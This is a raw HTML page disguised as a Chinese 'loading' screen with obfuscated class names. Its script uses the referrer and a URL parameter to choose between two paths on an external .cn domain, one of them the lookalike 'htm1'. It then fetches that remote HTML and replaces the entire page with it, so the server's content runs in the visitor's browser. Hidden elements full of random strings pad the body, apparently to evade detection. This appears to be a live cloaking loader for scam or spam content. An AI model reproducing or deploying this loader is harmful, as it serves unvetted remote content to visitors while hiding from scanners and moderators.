<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HmBejq4G2y9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HmBejq4G2y9 .kClbx6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HmBejq4G2y9 .content {
            line-height: 50px;
            text-align: center
        }

        .HmBejq4G2y9 .img {
            width: 100%
        }

        .HmBejq4G2y9 .OzMW6k {
            text-align: center
        }

        .HmBejq4G2y9 .OzMW6k span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HmBejq4G2y9 .OzMW6k span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HmBejq4G2y9 .OzMW6k span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HmBejq4G2y9 .OzMW6k span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HmBejq4G2y9 .OzMW6k span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HmBejq4G2y9 .OzMW6k span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HmBejq4G2y9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function G9L9xbK8F8g(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var A9zViq = G9L9xbK8F8g('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ A9zViq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ A9zViq +".html?a=share";
		}
		
        vBujhCBnq=url+"#"+new Date().getTime();
        vBujhCBnq && function() {
            $.get(vBujhCBnq, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >gZ8seF7MRI2RPe6FIneclpWDz4YP1oLvaF4QvSX7MyFl9uV96mzXhExIw4pMhUmBMGhTsqa35aNVfr0lFFKqJK5SQISiS49g</h1>
<h1 style='display:none' >gZ8seF7MRI2RPe6FIneclpWDz4YP1oLvaF4QvSX7MyFl9uV96mzXhExIw4pMhUmBMGhTsqa35aNVfr0lFFKqJK5SQISiS49g</h1>
<div style='display:none'>nlo6ELgZlPBFTUqMwZqrxTk4RBvoy6vUrVrp4H5CX0pwZRyoZleDBRT8GjcIu52eNg2X8tvUZvmiBkfkvpuz</div>
<div style='display:none'>nlo6ELgZlPBFTUqMwZqrxTk4RBvoy6vUrVrp4H5CX0pwZRyoZleDBRT8GjcIu52eNg2X8tvUZvmiBkfkvpuz</div>
<b style='display:none' >LU7nGvQA9Rhhpi94HJ1sazypRIvFIIN72I</b>
<a  href='#' style='display:none'>hq5BFIGDu96hiDlOv9CoEyvjiJVGEMeZtSW1WdmzgFddnv74ApsHLJFbPuDd7la7ld6yxEweMXQANPcvGOY8Cr331vmVQrwe</a>
<span style='display:none'>k3ynlD6ZC7XZCEuXstlcCUhjBLwVMaO8rmsCJJW5DI2aPZwRtDOfwjJY2oO3YzNq75citG19ULz3Ljt46xkoU53</span><div class="HmBejq4G2y9">
    <div class="kClbx6">
        <div class="OzMW6k">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>lCJ1Zp3SBRDgCIGb0owepmIotAMz68zK2SQIlSZUYMs1N4cFc1jnCWCnamHu</a>
<span style='display:none'>ngwJ0wdDW4AnqgomN15xnzJ8UFnO1qSx</span>
<img  src='' style='display:none'>
<ul style='display:none' >XnSw5ImPWrUSNPvI3E1T52CAK1U7liShPeXjpEfhnw5ZqfmOpPHMWlaKsoRN4HiplaTIj7ylAOw3Nf4o0y</ul>
<p  style='display:none'>bp6Hj1kFSpAR9YUnD5YknM1R4r5MhJtdL0v80yhiHU4EACLgCoIsfHBhNDHZysM9OSarUmKncyalDxAFVzaBn5b</p>
<img  src='' style='display:none'>
<h1 style='display:none' >YyTPJbOcRI2Euxfhqi</h1>
<b style='display:none' >BN97Fb2HjLs2Y6x7QJsK8v0Wpiddk6v8CMNNJOiaxGqbw2Z9</b>
<li style='display:none' >uZvFeNFrwHwb1HQpQOUS</li></body>
</html>